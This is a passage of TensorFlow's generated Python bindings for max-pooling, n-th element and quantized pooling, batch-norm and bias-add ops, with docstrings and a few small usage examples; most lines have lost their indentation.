"Expected list for 'strides' argument to "
"'max_pool_grad_with_argmax' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if include_batch_in_index is None:
include_batch_in_index = False
include_batch_in_index = _execute.make_bool(include_batch_in_index, "include_batch_in_index")
_attr_Targmax, (argmax,) = _execute.args_to_matching_eager([argmax], ctx, [_dtypes.int32, _dtypes.int64, ])
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(input, grad) = _inputs_T
_inputs_flat = [input, grad, argmax]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"include_batch_in_index", include_batch_in_index, "Targmax", _attr_Targmax,
"T", _attr_T)
_result = _execute.execute(b"MaxPoolGradWithArgmax", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolGradWithArgmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
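# Illustrative usage sketch (hypothetical helper, not part of the generated
# bindings). MaxPoolGradWithArgmax scatters the incoming gradient back to the
# positions recorded in `argmax`; every other input location receives zero.
def _example_max_pool_grad_with_argmax():
  import tensorflow as tf
  x = tf.reshape(tf.range(16.0), [1, 4, 4, 1])
  out, argmax = tf.raw_ops.MaxPoolWithArgmax(
      input=x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="VALID")
  dx = tf.raw_ops.MaxPoolGradWithArgmax(
      input=x, grad=tf.ones_like(out), argmax=argmax,
      ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="VALID")
  return dx  # ones at the four window maxima, zeros elsewhere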
def max_pool_v2(input, ksize, strides, padding, data_format="NHWC", name=None):
r"""Performs max pooling on the input.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`, `int32`, `int64`, `uint8`, `int16`, `int8`, `uint16`, `qint8`.
4-D input to pool over.
ksize: A `Tensor` of type `int32`.
The size of the window for each dimension of the input tensor.
strides: A `Tensor` of type `int32`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NHWC", "NCHW", "NCHW_VECT_C"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolV2", name, input, ksize, strides, "padding", padding,
"data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_v2_eager_fallback(
input, ksize, strides, padding=padding, data_format=data_format,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolV2", input=input, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "padding",
_op.get_attr("padding"), "data_format",
_op.get_attr("data_format"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolV2 = tf_export("raw_ops.MaxPoolV2")(_ops.to_raw_op(max_pool_v2))
def max_pool_v2_eager_fallback(input, ksize, strides, padding, data_format, name, ctx):
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.int64, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.uint16, _dtypes.qint8, ], _dtypes.float32)
ksize = _ops.convert_to_tensor(ksize, _dtypes.int32)
strides = _ops.convert_to_tensor(strides, _dtypes.int32)
_inputs_flat = [input, ksize, strides]
_attrs = ("T", _attr_T, "padding", padding, "data_format", data_format)
_result = _execute.execute(b"MaxPoolV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
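# Illustrative usage sketch (hypothetical helper, not part of the generated
# bindings). Unlike MaxPool, whose window geometry is baked in as op attrs,
# MaxPoolV2 takes `ksize` and `strides` as int32 tensors, so they can be
# computed at runtime.
def _example_max_pool_v2():
  import tensorflow as tf
  x = tf.random.normal([1, 6, 6, 3])
  ksize = tf.constant([1, 3, 3, 1], dtype=tf.int32)
  strides = tf.constant([1, 3, 3, 1], dtype=tf.int32)
  return tf.raw_ops.MaxPoolV2(input=x, ksize=ksize, strides=strides,
                              padding="VALID")  # shape (1, 2, 2, 3)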
_MaxPoolWithArgmaxOutput = collections.namedtuple(
"MaxPoolWithArgmax",
["output", "argmax"])
def max_pool_with_argmax(input, ksize, strides, padding, Targmax=_dtypes.int64, include_batch_in_index=False, name=None):
r"""Performs max pooling on the input and outputs both max values and indices.
The indices in `argmax` are flattened, so that a maximum value at position
`[b, y, x, c]` becomes flattened index:
`(y * width + x) * channels + c` if `include_batch_in_index` is False;
`((b * height + y) * width + x) * channels + c` if `include_batch_in_index` is True.
  The indices returned are always in `[0, height) x [0, width)` before
  flattening, even if padding is involved and the mathematically correct answer
  is outside (either negative or too large). This is a bug, but fixing it is
  difficult to do in a safe, backwards-compatible way, especially due to
  flattening.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
4-D with shape `[batch, height, width, channels]`. Input to pool over.
ksize: A list of `ints` that has length `>= 4`.
The size of the window for each dimension of the input tensor.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
Targmax: An optional `tf.DType` from: `tf.int32, tf.int64`. Defaults to `tf.int64`.
include_batch_in_index: An optional `bool`. Defaults to `False`.
Whether to include batch dimension in flattened index of `argmax`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, argmax).
output: A `Tensor`. Has the same type as `input`.
argmax: A `Tensor` of type `Targmax`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolWithArgmax", name, input, "ksize", ksize, "strides",
strides, "Targmax", Targmax, "padding", padding,
"include_batch_in_index", include_batch_in_index)
_result = _MaxPoolWithArgmaxOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_with_argmax_eager_fallback(
input, ksize=ksize, strides=strides, Targmax=Targmax,
padding=padding, include_batch_in_index=include_batch_in_index,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_with_argmax' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_with_argmax' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if Targmax is None:
Targmax = _dtypes.int64
Targmax = _execute.make_type(Targmax, "Targmax")
if include_batch_in_index is None:
include_batch_in_index = False
include_batch_in_index = _execute.make_bool(include_batch_in_index, "include_batch_in_index")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolWithArgmax", input=input, ksize=ksize, strides=strides,
padding=padding, Targmax=Targmax,
include_batch_in_index=include_batch_in_index,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "Targmax",
_op._get_attr_type("Targmax"), "padding",
_op.get_attr("padding"), "include_batch_in_index",
_op._get_attr_bool("include_batch_in_index"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolWithArgmax", _inputs_flat, _attrs, _result)
_result = _MaxPoolWithArgmaxOutput._make(_result)
return _result
MaxPoolWithArgmax = tf_export("raw_ops.MaxPoolWithArgmax")(_ops.to_raw_op(max_pool_with_argmax))
def max_pool_with_argmax_eager_fallback(input, ksize, strides, padding, Targmax, include_batch_in_index, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_with_argmax' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_with_argmax' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if Targmax is None:
Targmax = _dtypes.int64
Targmax = _execute.make_type(Targmax, "Targmax")
if include_batch_in_index is None:
include_batch_in_index = False
include_batch_in_index = _execute.make_bool(include_batch_in_index, "include_batch_in_index")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
_inputs_flat = [input]
_attrs = ("ksize", ksize, "strides", strides, "Targmax", Targmax, "padding",
padding, "include_batch_in_index", include_batch_in_index, "T", _attr_T)
_result = _execute.execute(b"MaxPoolWithArgmax", 2, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolWithArgmax", _inputs_flat, _attrs, _result)
_result = _MaxPoolWithArgmaxOutput._make(_result)
return _result
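# Illustrative usage sketch (hypothetical helper, not part of the generated
# bindings). It demonstrates the flattened-index formula from the docstring:
# with include_batch_in_index=False, a maximum at [b, y, x, c] is reported as
# (y * width + x) * channels + c. Here each input value equals its own
# flattened index, so `argmax` mirrors `output`.
def _example_max_pool_with_argmax():
  import tensorflow as tf
  x = tf.reshape(tf.range(16.0), [1, 4, 4, 1])  # width=4, channels=1
  out, argmax = tf.raw_ops.MaxPoolWithArgmax(
      input=x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="VALID")
  # Top-left window max 5.0 sits at y=1, x=1, c=0 -> (1 * 4 + 1) * 1 + 0 = 5.
  return out, argmax  # argmax values: 5, 7, 13, 15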
def nth_element(input, n, reverse=False, name=None):
r"""Finds values of the `n`-th order statistic for the last dimension.
  If the input is a vector (rank-1), finds the entry which is the nth-smallest
  value in the vector and outputs its value as a scalar tensor.

  For matrices (resp. higher-rank input), computes the entry which is the
  nth-smallest value in each row (resp. vector along the last dimension). Thus,
  `values.shape = input.shape[:-1]`.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
1-D or higher with last dimension at least `n+1`.
n: A `Tensor` of type `int32`.
      0-D. Position of the sorted vector to select along the last dimension
      (along each row for matrices). The valid range of `n` is
      `[0, input.shape[-1])`.
    reverse: An optional `bool`. Defaults to `False`.
      When set to `True`, finds the nth-largest value in the vector instead.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "NthElement", name, input, n, "reverse", reverse)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return nth_element_eager_fallback(
input, n, reverse=reverse, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if reverse is None:
reverse = False
reverse = _execute.make_bool(reverse, "reverse")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"NthElement", input=input, n=n, reverse=reverse, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("reverse", _op._get_attr_bool("reverse"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"NthElement", _inputs_flat, _attrs, _result)
_result, = _result
return _result
NthElement = tf_export("raw_ops.NthElement")(_ops.to_raw_op(nth_element))
def nth_element_eager_fallback(input, n, reverse, name, ctx):
if reverse is None:
reverse = False
reverse = _execute.make_bool(reverse, "reverse")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
n = _ops.convert_to_tensor(n, _dtypes.int32)
_inputs_flat = [input, n]
_attrs = ("reverse", reverse, "T", _attr_T)
_result = _execute.execute(b"NthElement", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"NthElement", _inputs_flat, _attrs, _result)
_result, = _result
return _result
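# Illustrative usage sketch (hypothetical helper, not part of the generated
# bindings). NthElement selects the n-th order statistic of each row; n is
# 0-based, so n=1 picks the second-smallest entry (or the second-largest when
# reverse=True).
def _example_nth_element():
  import tensorflow as tf
  x = tf.constant([[3., 1., 4., 1.], [5., 9., 2., 6.]])
  return tf.raw_ops.NthElement(input=x, n=1)  # [1., 5.]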
_QuantizedAvgPoolOutput = collections.namedtuple(
"QuantizedAvgPool",
["output", "min_output", "max_output"])
def quantized_avg_pool(input, min_input, max_input, ksize, strides, padding, name=None):
r"""Produces the average pool of the input tensor for quantized types.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
4-D with shape `[batch, height, width, channels]`.
min_input: A `Tensor` of type `float32`.
The float value that the lowest quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the highest quantized input value represents.
ksize: A list of `ints`.
The size of the window for each dimension of the input tensor.
The length must be 4 to match the number of dimensions of the input.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
tensor. The length must be 4 to match the number of dimensions of the input.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor`. Has the same type as `input`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedAvgPool", name, input, min_input, max_input, "ksize",
ksize, "strides", strides, "padding", padding)
_result = _QuantizedAvgPoolOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_avg_pool_eager_fallback(
input, min_input, max_input, ksize=ksize, strides=strides,
padding=padding, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'quantized_avg_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_avg_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedAvgPool", input=input, min_input=min_input,
max_input=max_input, ksize=ksize, strides=strides,
padding=padding, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "ksize", _op.get_attr("ksize"),
"strides", _op.get_attr("strides"), "padding",
_op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedAvgPool", _inputs_flat, _attrs, _result)
_result = _QuantizedAvgPoolOutput._make(_result)
return _result
QuantizedAvgPool = tf_export("raw_ops.QuantizedAvgPool")(_ops.to_raw_op(quantized_avg_pool))
def quantized_avg_pool_eager_fallback(input, min_input, max_input, ksize, strides, padding, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'quantized_avg_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_avg_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
_inputs_flat = [input, min_input, max_input]
_attrs = ("T", _attr_T, "ksize", ksize, "strides", strides, "padding",
padding)
_result = _execute.execute(b"QuantizedAvgPool", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedAvgPool", _inputs_flat, _attrs, _result)
_result = _QuantizedAvgPoolOutput._make(_result)
return _result
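# Example (illustrative sketch, not part of the generated bindings): calling
# this op through the stable `tf.raw_ops` endpoint. Assumes TensorFlow 2.x
# imported as `tf`; the tensor values and quantization range are hypothetical.
#
#   import tensorflow as tf
#
#   q = tf.quantization.quantize(
#       tf.reshape(tf.range(16, dtype=tf.float32), [1, 4, 4, 1]),
#       min_range=0.0, max_range=15.0, T=tf.quint8)
#   pooled = tf.raw_ops.QuantizedAvgPool(
#       input=q.output, min_input=q.output_min, max_input=q.output_max,
#       ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="VALID")
#   # pooled.output is quantized; pooled.min_output / pooled.max_output give
#   # the float range its values represent.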
_QuantizedBatchNormWithGlobalNormalizationOutput = collections.namedtuple(
"QuantizedBatchNormWithGlobalNormalization",
["result", "result_min", "result_max"])
def quantized_batch_norm_with_global_normalization(t, t_min, t_max, m, m_min, m_max, v, v_min, v_max, beta, beta_min, beta_max, gamma, gamma_min, gamma_max, out_type, variance_epsilon, scale_after_normalization, name=None):
r"""Quantized Batch normalization.
This op is deprecated and will be removed in the future. Prefer
`tf.nn.batch_normalization`.
Args:
t: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A 4D input Tensor.
t_min: A `Tensor` of type `float32`.
The value represented by the lowest quantized input.
t_max: A `Tensor` of type `float32`.
The value represented by the highest quantized input.
m: A `Tensor`. Must have the same type as `t`.
A 1D mean Tensor with size matching the last dimension of t.
This is the first output from tf.nn.moments,
or a saved moving average thereof.
m_min: A `Tensor` of type `float32`.
The value represented by the lowest quantized mean.
m_max: A `Tensor` of type `float32`.
The value represented by the highest quantized mean.
v: A `Tensor`. Must have the same type as `t`.
A 1D variance Tensor with size matching the last dimension of t.
This is the second output from tf.nn.moments,
or a saved moving average thereof.
v_min: A `Tensor` of type `float32`.
The value represented by the lowest quantized variance.
v_max: A `Tensor` of type `float32`.
The value represented by the highest quantized variance.
beta: A `Tensor`. Must have the same type as `t`.
A 1D beta Tensor with size matching the last dimension of t.
An offset to be added to the normalized tensor.
beta_min: A `Tensor` of type `float32`.
The value represented by the lowest quantized offset.
beta_max: A `Tensor` of type `float32`.
The value represented by the highest quantized offset.
gamma: A `Tensor`. Must have the same type as `t`.
A 1D gamma Tensor with size matching the last dimension of t.
If "scale_after_normalization" is true, this tensor will be multiplied
with the normalized tensor.
gamma_min: A `Tensor` of type `float32`.
The value represented by the lowest quantized gamma.
gamma_max: A `Tensor` of type `float32`.
The value represented by the highest quantized gamma.
out_type: A `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`.
variance_epsilon: A `float`. A small float number to avoid dividing by 0.
scale_after_normalization: A `bool`.
A bool indicating whether the resulting tensor
needs to be multiplied by gamma.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (result, result_min, result_max).
result: A `Tensor` of type `out_type`.
result_min: A `Tensor` of type `float32`.
result_max: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedBatchNormWithGlobalNormalization", name, t, t_min,
t_max, m, m_min, m_max, v, v_min, v_max, beta, beta_min, beta_max,
gamma, gamma_min, gamma_max, "out_type", out_type, "variance_epsilon",
variance_epsilon, "scale_after_normalization",
scale_after_normalization)
_result = _QuantizedBatchNormWithGlobalNormalizationOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_batch_norm_with_global_normalization_eager_fallback(
t, t_min, t_max, m, m_min, m_max, v, v_min, v_max, beta, beta_min,
beta_max, gamma, gamma_min, gamma_max, out_type=out_type,
variance_epsilon=variance_epsilon,
scale_after_normalization=scale_after_normalization, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
out_type = _execute.make_type(out_type, "out_type")
variance_epsilon = _execute.make_float(variance_epsilon, "variance_epsilon")
scale_after_normalization = _execute.make_bool(scale_after_normalization, "scale_after_normalization")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedBatchNormWithGlobalNormalization", t=t, t_min=t_min,
t_max=t_max, m=m,
m_min=m_min, m_max=m_max,
v=v, v_min=v_min,
v_max=v_max, beta=beta,
beta_min=beta_min,
beta_max=beta_max,
gamma=gamma,
gamma_min=gamma_min,
gamma_max=gamma_max,
out_type=out_type,
variance_epsilon=variance_epsilon,
scale_after_normalization=scale_after_normalization,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "out_type",
_op._get_attr_type("out_type"), "variance_epsilon",
_op.get_attr("variance_epsilon"), "scale_after_normalization",
_op._get_attr_bool("scale_after_normalization"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedBatchNormWithGlobalNormalization", _inputs_flat, _attrs, _result)
_result = _QuantizedBatchNormWithGlobalNormalizationOutput._make(_result)
return _result
QuantizedBatchNormWithGlobalNormalization = tf_export("raw_ops.QuantizedBatchNormWithGlobalNormalization")(_ops.to_raw_op(quantized_batch_norm_with_global_normalization))
def quantized_batch_norm_with_global_normalization_eager_fallback(t, t_min, t_max, m, m_min, m_max, v, v_min, v_max, beta, beta_min, beta_max, gamma, gamma_min, gamma_max, out_type, variance_epsilon, scale_after_normalization, name, ctx):
out_type = _execute.make_type(out_type, "out_type")
variance_epsilon = _execute.make_float(variance_epsilon, "variance_epsilon")
scale_after_normalization = _execute.make_bool(scale_after_normalization, "scale_after_normalization")
_attr_Tinput, _inputs_Tinput = _execute.args_to_matching_eager([t, m, v, beta, gamma], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
(t, m, v, beta, gamma) = _inputs_Tinput
t_min = _ops.convert_to_tensor(t_min, _dtypes.float32)
t_max = _ops.convert_to_tensor(t_max, _dtypes.float32)
m_min = _ops.convert_to_tensor(m_min, _dtypes.float32)
m_max = _ops.convert_to_tensor(m_max, _dtypes.float32)
v_min = _ops.convert_to_tensor(v_min, _dtypes.float32)
v_max = _ops.convert_to_tensor(v_max, _dtypes.float32)
beta_min = _ops.convert_to_tensor(beta_min, _dtypes.float32)
beta_max = _ops.convert_to_tensor(beta_max, _dtypes.float32)
gamma_min = _ops.convert_to_tensor(gamma_min, _dtypes.float32)
gamma_max = _ops.convert_to_tensor(gamma_max, _dtypes.float32)
_inputs_flat = [t, t_min, t_max, m, m_min, m_max, v, v_min, v_max, beta, beta_min, beta_max, gamma, gamma_min, gamma_max]
_attrs = ("Tinput", _attr_Tinput, "out_type", out_type, "variance_epsilon",
variance_epsilon, "scale_after_normalization", scale_after_normalization)
_result = _execute.execute(b"QuantizedBatchNormWithGlobalNormalization", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedBatchNormWithGlobalNormalization", _inputs_flat, _attrs, _result)
_result = _QuantizedBatchNormWithGlobalNormalizationOutput._make(_result)
return _result
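# Example (illustrative sketch): the docstring above deprecates this op in
# favor of `tf.nn.batch_normalization`, which works on float tensors. A
# minimal float-side equivalent, with hypothetical shapes and epsilon:
#
#   import tensorflow as tf
#
#   x = tf.random.normal([2, 4, 4, 3])
#   mean, variance = tf.nn.moments(x, axes=[0, 1, 2])
#   y = tf.nn.batch_normalization(
#       x, mean, variance,
#       offset=tf.zeros([3]),  # beta
#       scale=tf.ones([3]),    # gamma; pass None to skip scaling, mirroring
#                              # scale_after_normalization=False
#       variance_epsilon=1e-5)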
_QuantizedBiasAddOutput = collections.namedtuple(
"QuantizedBiasAdd",
["output", "min_out", "max_out"])
def quantized_bias_add(input, bias, min_input, max_input, min_bias, max_bias, out_type, name=None):
r"""Adds Tensor 'bias' to Tensor 'input' for Quantized types.
Broadcasts the values of bias on dimensions 0..N-2 of 'input'.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A 1D bias Tensor with size matching the last dimension of 'input'.
min_input: A `Tensor` of type `float32`.
The float value that the lowest quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the highest quantized input value represents.
min_bias: A `Tensor` of type `float32`.
The float value that the lowest quantized bias value represents.
max_bias: A `Tensor` of type `float32`.
The float value that the highest quantized bias value represents.
out_type: A `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_out, max_out).
output: A `Tensor` of type `out_type`.
min_out: A `Tensor` of type `float32`.
max_out: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedBiasAdd", name, input, bias, min_input, max_input,
min_bias, max_bias, "out_type", out_type)
_result = _QuantizedBiasAddOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_bias_add_eager_fallback(
input, bias, min_input, max_input, min_bias, max_bias,
out_type=out_type, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
out_type = _execute.make_type(out_type, "out_type")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedBiasAdd", input=input, bias=bias, min_input=min_input,
max_input=max_input, min_bias=min_bias,
max_bias=max_bias, out_type=out_type, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T1", _op._get_attr_type("T1"), "T2", _op._get_attr_type("T2"),
"out_type", _op._get_attr_type("out_type"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedBiasAdd", _inputs_flat, _attrs, _result)
_result = _QuantizedBiasAddOutput._make(_result)
return _result
QuantizedBiasAdd = tf_export("raw_ops.QuantizedBiasAdd")(_ops.to_raw_op(quantized_bias_add))
def quantized_bias_add_eager_fallback(input, bias, min_input, max_input, min_bias, max_bias, out_type, name, ctx):
out_type = _execute.make_type(out_type, "out_type")
_attr_T1, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_T2, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_bias = _ops.convert_to_tensor(min_bias, _dtypes.float32)
max_bias = _ops.convert_to_tensor(max_bias, _dtypes.float32)
_inputs_flat = [input, bias, min_input, max_input, min_bias, max_bias]
_attrs = ("T1", _attr_T1, "T2", _attr_T2, "out_type", out_type)
_result = _execute.execute(b"QuantizedBiasAdd", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedBiasAdd", _inputs_flat, _attrs, _result)
_result = _QuantizedBiasAddOutput._make(_result)
return _result
